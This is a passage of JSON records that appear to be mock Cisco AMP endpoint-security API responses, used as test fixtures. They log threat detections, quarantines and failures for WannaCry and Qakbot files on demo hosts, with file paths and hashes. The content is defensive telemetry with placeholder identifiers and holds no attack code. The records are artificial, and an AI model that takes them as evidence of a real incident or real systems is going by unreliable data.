Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303569945526289","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79","sha1":"47a9ad4125b6bd7c55e4e7da251e23f089407b8f","md5":"4fef5e34143e646dbf9907c4374276f5"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":782000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303569945526000,"timestamp":1610652550,"timestamp_nanoseconds":751000000,"date":"2021-01-14T19:29:10+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":791000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":783000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":727000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558982","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":721000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558981","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":7144,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":646000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558980","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":504000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419303565650558979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":426000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303565650559000,"timestamp":1610652549,"timestamp_nanoseconds":399000000,"date":"2021-01-14T19:29:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419303565650558977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":768,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662859016176000,"timestamp":1610651432,"timestamp_nanoseconds":199000000,"date":"2021-01-14T19:10:32+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662854721208000,"timestamp":1610651431,"timestamp_nanoseconds":856000000,"date":"2021-01-14T19:10:31+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":233000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"el2j9fcqj.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\el2j9fcqj.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241034","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412662850426241000,"timestamp":1610651430,"timestamp_nanoseconds":218000000,"date":"2021-01-14T19:10:30+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412662850426241033","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281601187807000,"timestamp":1610647435,"timestamp_nanoseconds":891000000,"date":"2021-01-14T18:03:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-95.SBX.TG","detection_id":"6419281601187807332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":396000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419281588302905000,"timestamp":1610647432,"timestamp_nanoseconds":927000000,"date":"2021-01-14T18:03:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419281588302905443","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 